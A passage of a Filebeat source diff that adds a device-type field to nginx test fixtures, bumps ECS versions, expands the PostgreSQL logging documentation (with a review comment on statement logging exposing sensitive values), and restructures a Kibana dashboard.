"user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36", "user_agent.os.full": "Mac OS X 10.12.0", 
@@ -282,6 +287,7 @@ "source.ip": "77.179.66.156", "url.original": "/test", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36", "user_agent.os.full": "Mac OS X 10.12.0", @@ -330,6 +336,7 @@ "source.ip": "77.179.66.156", "url.original": "/test", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36", "user_agent.os.full": "Mac OS X 10.12.0", @@ -378,6 +385,7 @@ "source.ip": "77.179.66.156", "url.original": "/test1", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36", "user_agent.os.full": "Mac OS X 10.12.0", @@ -416,6 +424,7 @@ "source.ip": "127.0.0.1", "url.original": "/test1", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36", "user_agent.os.full": "Mac OS X 10.12.0", @@ -454,6 +463,7 @@ "source.ip": "127.0.0.1", "url.original": "/", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0", "user_agent.os.full": "Mac OS X 10.12", 
@@ -492,6 +502,7 @@ "source.ip": "127.0.0.1", "url.original": "/", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0", "user_agent.os.full": "Mac OS X 10.12", @@ -530,6 +541,7 @@ "source.ip": "127.0.0.1", "url.original": "/taga", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0", "user_agent.os.full": "Mac OS X 10.12", diff --git a/filebeat/module/nginx/access/test/test-with-host.log-expected.json b/filebeat/module/nginx/access/test/test-with-host.log-expected.json index e07836ce520..3681593b21f 100644 --- a/filebeat/module/nginx/access/test/test-with-host.log-expected.json +++ b/filebeat/module/nginx/access/test/test-with-host.log-expected.json @@ -33,6 +33,7 @@ "source.ip": "10.0.0.2", "url.original": "/ocelot", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0", "user_agent.os.full": "Mac OS X 10.12", @@ -72,6 +73,7 @@ "source.ip": "172.17.0.1", "url.original": "/stringpatch", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox Alpha", "user_agent.original": "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2", "user_agent.os.full": "Windows 7", @@ -123,6 +125,7 @@ "source.ip": "85.181.35.98", "url.original": "/ocelot", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0", "user_agent.os.full": "Mac OS X 10.12", 
@@ -173,6 +176,7 @@ "source.ip": "85.181.35.98", "url.original": "/ocelot", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36", "user_agent.os.full": "Mac OS X 10.14.0", @@ -226,6 +230,7 @@ "source.ip": "199.96.1.1", "url.original": "/assets/xxxx?q=100", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "Amazon CloudFront" }, @@ -269,6 +274,7 @@ "source.ip": "2a03:0000:10ff:f00f:0000:0000:0:8000", "url.original": "/test.html", "user_agent.device.name": "Spider", + "user_agent.device.type": "Robot", "user_agent.name": "Facebot", "user_agent.original": "Mozilla/5.0 (compatible; Facebot 1.0; https://developers.facebook.com/docs/sharing/webmasters/crawler)", "user_agent.version": "1.0" @@ -358,6 +364,7 @@ "source.address": "localhost", "url.original": "/test2", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox Alpha", "user_agent.original": "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2", "user_agent.os.full": "Windows 7", @@ -394,6 +401,7 @@ "source.address": "localhost", "url.original": "/test2", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox Alpha", "user_agent.original": "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2", "user_agent.os.full": "Windows 7", diff --git a/filebeat/module/nginx/access/test/test.log-expected.json b/filebeat/module/nginx/access/test/test.log-expected.json index b27c9ccf19b..2f5e1a7f9cc 100644 --- a/filebeat/module/nginx/access/test/test.log-expected.json +++ b/filebeat/module/nginx/access/test/test.log-expected.json 
@@ -32,6 +32,7 @@ "source.ip": "10.0.0.2", "url.original": "/ocelot", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0", "user_agent.os.full": "Mac OS X 10.12", @@ -70,6 +71,7 @@ "source.ip": "172.17.0.1", "url.original": "/stringpatch", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox Alpha", "user_agent.original": "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2", "user_agent.os.full": "Windows 7", @@ -120,6 +122,7 @@ "source.ip": "85.181.35.98", "url.original": "/ocelot", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0", "user_agent.os.full": "Mac OS X 10.12", @@ -168,6 +171,7 @@ "source.ip": "85.181.35.98", "url.original": "/ocelot", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36", "user_agent.os.full": "Mac OS X 10.14.0", @@ -219,6 +223,7 @@ "source.ip": "199.96.1.1", "url.original": "/assets/xxxx?q=100", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "Amazon CloudFront" }, @@ -260,6 +265,7 @@ "source.ip": "2a03:0000:10ff:f00f:0000:0000:0:8000", "url.original": "/test.html", "user_agent.device.name": "Spider", + "user_agent.device.type": "Robot", "user_agent.name": "Facebot", "user_agent.original": "Mozilla/5.0 (compatible; Facebot 1.0; https://developers.facebook.com/docs/sharing/webmasters/crawler)", "user_agent.version": "1.0" 
@@ -340,6 +346,7 @@ "source.address": "localhost", "url.original": "/test2", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox Alpha", "user_agent.original": "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2", "user_agent.os.full": "Windows 7", @@ -375,6 +382,7 @@ "source.address": "localhost", "url.original": "/test2", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox Alpha", "user_agent.original": "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2", "user_agent.os.full": "Windows 7", diff --git a/filebeat/module/nginx/error/config/nginx-error.yml b/filebeat/module/nginx/error/config/nginx-error.yml index bc547d46f36..617dbdc3eaa 100644 --- a/filebeat/module/nginx/error/config/nginx-error.yml +++ b/filebeat/module/nginx/error/config/nginx-error.yml @@ -14,4 +14,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/nginx/ingress_controller/config/ingress_controller.yml b/filebeat/module/nginx/ingress_controller/config/ingress_controller.yml index 2bd2a117d1c..a33bd9b635e 100644 --- a/filebeat/module/nginx/ingress_controller/config/ingress_controller.yml +++ b/filebeat/module/nginx/ingress_controller/config/ingress_controller.yml @@ -10,4 +10,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/nginx/ingress_controller/test/test.log-expected.json b/filebeat/module/nginx/ingress_controller/test/test.log-expected.json index 89c37b4a38e..e55c45814de 100644 --- a/filebeat/module/nginx/ingress_controller/test/test.log-expected.json +++ b/filebeat/module/nginx/ingress_controller/test/test.log-expected.json 
@@ -52,6 +52,7 @@ "source.ip": "192.168.64.1", "url.original": "/products", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "curl", "user_agent.original": "curl/7.54.0", "user_agent.version": "7.54.0" @@ -109,6 +110,7 @@ "source.ip": "192.168.64.1", "url.original": "/products/42", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "curl", "user_agent.original": "curl/7.54.0", "user_agent.version": "7.54.0" @@ -166,6 +168,7 @@ "source.ip": "192.168.64.1", "url.original": "/products/42", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "curl", "user_agent.original": "curl/7.54.0", "user_agent.version": "7.54.0" @@ -223,6 +226,7 @@ "source.ip": "192.168.64.1", "url.original": "/products/42", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "curl", "user_agent.original": "curl/7.54.0", "user_agent.version": "7.54.0" @@ -352,6 +356,7 @@ "source.ip": "192.168.64.1", "url.original": "/products/42", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Wget", "user_agent.original": "Wget/1.20.3 (darwin18.6.0)", "user_agent.version": "1.20.3" @@ -409,6 +414,7 @@ "source.ip": "192.168.64.1", "url.original": "/products/42", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36", "user_agent.os.full": "Mac OS X 10.14.6", @@ -470,6 +476,7 @@ "source.ip": "192.168.64.1", "url.original": "/favicon.ico", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36", "user_agent.os.full": "Mac OS X 10.14.6", 
@@ -530,6 +537,7 @@ "source.ip": "192.168.64.1", "url.original": "/v2", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36", "user_agent.os.full": "Mac OS X 10.14.6", @@ -591,6 +599,7 @@ "source.ip": "192.168.64.1", "url.original": "/favicon.ico", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36", "user_agent.os.full": "Mac OS X 10.14.6", @@ -651,6 +660,7 @@ "source.ip": "192.168.64.1", "url.original": "/products/42", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Safari", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15", "user_agent.os.full": "Mac OS X 10.14.6", @@ -712,6 +722,7 @@ "source.ip": "192.168.64.1", "url.original": "/favicon.ico", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Safari", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15", "user_agent.os.full": "Mac OS X 10.14.6", @@ -772,6 +783,7 @@ "source.ip": "192.168.64.1", "url.original": "/products/42", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Safari", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15", "user_agent.os.full": "Mac OS X 10.14.6", 
@@ -832,6 +844,7 @@ "source.ip": "192.168.64.1", "url.original": "/", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Safari", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15", "user_agent.os.full": "Mac OS X 10.14.6", @@ -893,6 +906,7 @@ "source.ip": "192.168.64.1", "url.original": "/favicon.ico", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Safari", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15", "user_agent.os.full": "Mac OS X 10.14.6", @@ -953,6 +967,7 @@ "source.ip": "192.168.64.1", "url.original": "/v2", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Safari", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15", "user_agent.os.full": "Mac OS X 10.14.6", @@ -1014,6 +1029,7 @@ "source.ip": "192.168.64.1", "url.original": "/favicon.ico", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Safari", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15", "user_agent.os.full": "Mac OS X 10.14.6", @@ -1074,6 +1090,7 @@ "source.ip": "192.168.64.1", "url.original": "/products/42?address=delhi+technological+university", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Python Requests", "user_agent.original": "python-requests/2.22.0", "user_agent.version": "2.22" 
@@ -1131,6 +1148,7 @@ "source.ip": "192.168.64.1", "url.original": "/v2", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -1191,6 +1209,7 @@ "source.ip": "192.168.64.1", "url.original": "/favicon.ico", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -1251,6 +1270,7 @@ "source.ip": "192.168.64.1", "url.original": "/v2/some", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -1315,6 +1335,7 @@ "source.ip": "192.168.64.14", "url.original": "/v2/some", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", diff --git a/filebeat/module/osquery/result/config/result.yml b/filebeat/module/osquery/result/config/result.yml index cd17ae39bdf..c4b45c1f03f 100644 --- a/filebeat/module/osquery/result/config/result.yml +++ b/filebeat/module/osquery/result/config/result.yml @@ -10,4 +10,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/pensando/dfw/config/dfw.yml b/filebeat/module/pensando/dfw/config/dfw.yml index 404eac5f138..87d84b6abac 100644 --- a/filebeat/module/pensando/dfw/config/dfw.yml +++ b/filebeat/module/pensando/dfw/config/dfw.yml 
@@ -20,4 +20,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.9.0 diff --git a/filebeat/module/postgresql/_meta/docs.asciidoc b/filebeat/module/postgresql/_meta/docs.asciidoc index 840a15ccd82..1d27610bd8f 100644 --- a/filebeat/module/postgresql/_meta/docs.asciidoc +++ b/filebeat/module/postgresql/_meta/docs.asciidoc 
@@ -21,6 +21,80 @@ The +{modulename}+ module using `.log` was tested with logs from versions 9.5 on The +{modulename}+ module using `.csv` was tested using versions 11 and 13 (distro is not relevant here). +[float] +=== Supported log formats + +This module can collect any logs from PostgreSQL servers, but to be able to +better analyze their contents and extract more information, they should be +formatted in a determined way. + +There are some settings to take into account for the log format. + +Log lines should be preffixed with the timestamp in milliseconds, the process +id, the user id and the database name. This uses to be the default in most +distributions, and is translated to this setting in the configuration file: + +["source","sh"] +---------------------------- +log_line_prefix = '%m [%p] %q%u@%d ' +---------------------------- + +PostgreSQL server can be configured to log statements and their durations and +this module is able to collect this information. To be able to correlate each +duration with their statements, they must be logged in the same line. This +happens when the following options are used: + +["source","sh"] +---------------------------- +log_duration = 'on' +log_statement = 'none' +log_min_duration_statement = 0 +---------------------------- + +Setting a zero value in `log_min_duration_statement` will log all statements +executed by a client. You probably want to configure it to a higher value, so it +logs only slower statements. This value is configured in milliseconds. + +When using `log_statement` and `log_duration` together, statements and durations +are logged in different lines, and {beatname_uc} is not able to correlate both +values, for this reason it is recommended to disable `log_statement`. + +NOTE: The PostgreSQL module of Metricbeat is also able to collect information +about all statements executed in the server. You may chose which one is better +for your needings. 
An important difference is that the Metricbeat module +collects aggregated information when the statement is executed several times, +but cannot know when each statement was executed. This information can be +obtained from logs. + +Other logging options that you may consider to enable are the following ones: + +["source","sh"] +---------------------------- +log_checkpoints = 'on'; +log_connections = 'on'; +log_disconnections = 'on'; +log_lock_waits = 'on'; +---------------------------- + +Both `log_connections` and `log_disconnections` can cause a lot of events if you +don't have persistent connections, so enable with care. + +[float] +=== Using CSV logs + +Since the PostgreSQL CSV log file is a well-defined format, +there is almost no configuration to be done in {beatname_uc}, just the filepath. + +On the other hand, it's necessary to configure postgresql to emit `.csv` logs. +The recommended parameters are: + +["source","sh"] +---------------------------- +logging_collector = 'on'; +log_destination = 'csvlog'; +---------------------------- + + include::../include/configuring-intro.asciidoc[] The following example shows how to set paths in the +modules.d/{modulename}.yml+ 
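Review bot: The new "Supported log formats" section recommends `log_min_duration_statement = 0` without mentioning that PostgreSQL then writes the full text of every statement, literal values included, to the server log that this module collects. Statements such as `ALTER ROLE ... PASSWORD '...'`, or queries that carry personal data, would land in the log files and, presumably via the `postgresql.log.query` field that the overview dashboard in this commit lists as a column, in the Filebeat indices. The paragraph that follows the setting only discusses volume ("logs only slower statements"), not content. I would add a note after it, for example: `NOTE: Logged statements include their literal values, which can contain credentials or personal data. Restrict access to the log files and to the indices that store them, and prefer a threshold above zero.`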
@@ -64,38 +138,14 @@ The first dashboard is for regular logs. [role="screenshot"] image::./images/filebeat-postgresql-overview.png[] -The second one shows the slowlogs of PostgreSQL. +The second one shows the slowlogs of PostgreSQL. If `log_min_duration_statement` +is not used, this dashboard will show incomplete or no data. [role="screenshot"] image::./images/filebeat-postgresql-slowlog-overview.png[] :has-dashboards!: -=== Using CSV logs - -Since the PostgreSQL CSV log file is a well-defined format, -there is almost no configuration to be done in filebeat, just the filepath - -On the other hand, it's necessary to configure postgresql to emit `.csv` logs. -The recommended parameters are: - -``` -logging_collector = 'on'; -log_destination = 'csvlog'; -log_statement = 'none'; -log_checkpoints = on; -log_connections = on; -log_disconnections = on; -log_lock_waits = on; -log_min_duration_statement = 0; -``` - -In busy servers, `log_min_duration_statement` can cause contention, so you can assign -a value greater than 0. - -Both `log_connections` and `log_disconnections` can cause a lot of events if you don't have -persistent connections, so enable with care. - :fileset_ex!: :modulename!: diff --git a/filebeat/module/postgresql/_meta/kibana/7/dashboard/Filebeat-Postgresql-overview.json b/filebeat/module/postgresql/_meta/kibana/7/dashboard/Filebeat-Postgresql-overview.json index ad349eece92..b43d4afef5c 100644 --- a/filebeat/module/postgresql/_meta/kibana/7/dashboard/Filebeat-Postgresql-overview.json +++ b/filebeat/module/postgresql/_meta/kibana/7/dashboard/Filebeat-Postgresql-overview.json 
@@ -1,331 +1,496 @@ { - "objects": [ + "objects": [ + { + "attributes": { + "description": "Overview dashboard for the Filebeat PostgreSQL module", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "highlightAll": true, + "query": { + "language": "kuery", + "query": "" + }, + "version": true + } + }, + "optionsJSON": { + "darkTheme": false + }, + "panelsJSON": [ + { + "embeddableConfig": { + "vis": { + "params": { + "sort": { + "columnIndex": null, + "direction": null + } + } + } + }, + "gridData": { + "h": 12, + "i": "1", + "w": 12, + "x": 0, + "y": 0 + }, + "panelIndex": "1", + "panelRefName": "panel_0", + "version": "7.3.0" + }, + { + "embeddableConfig": { + "columns": [ + "user.name", + "postgresql.log.database", + "log.level", + "message", + "postgresql.log.query" + ], + "sort": [ + "@timestamp", + "desc" + ] + }, + "gridData": { + "h": 24, + "i": "2", + "w": 48, + "x": 0, + "y": 12 + }, + "panelIndex": "2", + "panelRefName": "panel_1", + "version": "7.3.0" + }, + { + "embeddableConfig": {}, + "gridData": { + "h": 12, + "i": "3", + "w": 36, + "x": 12, + "y": 0 + }, + "panelIndex": "3", + "panelRefName": "panel_2", + "version": "7.3.0" + } + ], + "timeRestore": false, + "title": "[Filebeat PostgreSQL] Overview ECS", + "version": 1 + }, + "id": "158be870-87f4-11e7-ad9c-db80de0bf8d3-ecs", + "migrationVersion": { + "dashboard": "7.9.3" + }, + "namespaces": [ + "default" + ], + "references": [ + { + "id": "PostgreSQL Log Level Count-ecs", + "name": "panel_0", + "type": "visualization" + }, + { + "id": "PostgreSQL All Logs-ecs", + "name": "panel_1", + "type": "search" + }, + { + "id": "3dbd5370-87f3-11e7-ad9c-db80de0bf8d3-ecs", + "name": "panel_2", + "type": "visualization" + } + ], + "type": "dashboard", + "updated_at": "2021-03-17T16:06:10.364Z", + "version": "WzIxLDFd" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + 
"meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "event.dataset", + "negate": false, + "params": { + "query": "postgresql.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "postgresql.log" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "Log Level Count [Filebeat PostgreSQL] ECS", + "uiStateJSON": { + "vis": { + "params": { + "sort": { + "columnIndex": null, + "direction": null + } + } + } + }, + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": {}, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "field": "log.level", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": false, + "otherBucketLabel": "Other", + "size": 12 + }, + "schema": "bucket", + "type": "terms" + } + ], + "params": { + "perPage": 10, + "percentageCol": "", + "showMetricsAtAllLevels": false, + "showPartialRows": false, + "showTotal": false, + "sort": { + "columnIndex": null, + "direction": null + }, + "totalFunc": "sum" + }, + "title": "Log Level Count [Filebeat PostgreSQL] ECS", + "type": "table" + } + }, + "id": "PostgreSQL Log Level Count-ecs", + "migrationVersion": { + "visualization": "7.10.0" + }, + "namespaces": [ + "default" + ], + "references": [ + { + "id": "filebeat-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [] - } - }, - "savedSearchId": "PostgreSQL All Logs-ecs", - "title": "Log Level Count [Filebeat PostgreSQL] ECS", - "uiStateJSON": { - "vis": { - "params": { - "sort": { - "columnIndex": null, - "direction": null - } - } - } - }, - "version": 1, - "visState": { - 
"aggs": [ - { - "enabled": true, - "id": "1", - "params": {}, - "schema": "metric", - "type": "count" - }, - { - "enabled": true, - "id": "2", - "params": { - "field": "log.level", - "order": "desc", - "orderBy": "1", - "size": 12 - }, - "schema": "bucket", - "type": "terms" - } - ], - "params": { - "perPage": 10, - "showMeticsAtAllLevels": false, - "showPartialRows": false, - "showTotal": false, - "sort": { - "columnIndex": null, - "direction": null - }, - "totalFunc": "sum" - }, - "title": "Log Level Count [Filebeat PostgreSQL] ECS", - "type": "table" + "id": "PostgreSQL All Logs-ecs", + "name": "search_0", + "type": "search" + } + ], + "type": "visualization", + "updated_at": "2021-03-17T16:31:15.326Z", + "version": "WzI5OSwxXQ==" + }, + { + "attributes": { + "columns": [ + "user.name", + "postgresql.log.database", + "log.level", + "message", + "postgresql.log.query" + ], + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "event.dataset", + "negate": false, + "params": { + "query": "postgresql.log" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "postgresql.log" + } } - }, - "id": "PostgreSQL Log Level Count-ecs", - "type": "visualization", - "version": 2 - }, + } + ], + "highlightAll": true, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "kuery", + "query": "" + }, + "version": true + } + }, + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "title": "All Logs [Filebeat PostgreSQL] ECS", + "version": 1 + }, + "id": "PostgreSQL All Logs-ecs", + "migrationVersion": { + "search": "7.9.3" + }, + "namespaces": [ + "default" + ], + "references": [ { - "attributes": { - "columns": [ - "user.name", - "postgresql.log.database", - "log.level", - "message", - 
"postgresql.log.query" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "filebeat-*", - "key": "event.module", - "negate": false, - "params": { - "query": "postgresql", - "type": "phrase" - }, - "type": "phrase", - "value": "postgresql" - }, - "query": { - "match": { - "event.module": { - "query": "postgresql", - "type": "phrase" - } - } - } - } - ], - "highlightAll": true, - "index": "filebeat-*", - "query": { - "language": "kuery", - "query": "" - }, - "version": true - } - }, - "sort": [ - "@timestamp", - "desc" - ], - "title": "All Logs [Filebeat PostgreSQL] ECS", - "version": 1 - }, - "id": "PostgreSQL All Logs-ecs", - "type": "search", - "version": 1 - }, + "id": "filebeat-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + }, { - "attributes": { - "description": "", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [] - } - }, - "savedSearchId": "PostgreSQL All Logs-ecs", - "title": "Logs by level over time [Filebeat PostgreSQL] ECS", - "uiStateJSON": {}, - "version": 1, - "visState": { - "aggs": [ - { - "enabled": true, - "id": "1", - "params": {}, - "schema": "metric", - "type": "count" - }, - { - "enabled": true, - "id": "2", - "params": { - "customInterval": "2h", - "extended_bounds": {}, - "field": "@timestamp", - "interval": "auto", - "min_doc_count": 1 - }, - "schema": "segment", - "type": "date_histogram" - }, - { - "enabled": true, - "id": "3", - "params": { - "field": "log.level", - "order": "desc", - "orderBy": "1", - "size": 5 - }, - "schema": "group", - "type": "terms" - } - ], - "params": { - "addLegend": true, - "addTimeMarker": false, - "addTooltip": true, - "categoryAxes": [ - { - "id": "CategoryAxis-1", - "labels": { - "show": true, - "truncate": 100 - }, - "position": "bottom", - "scale": { - "type": "linear" - }, - "show": 
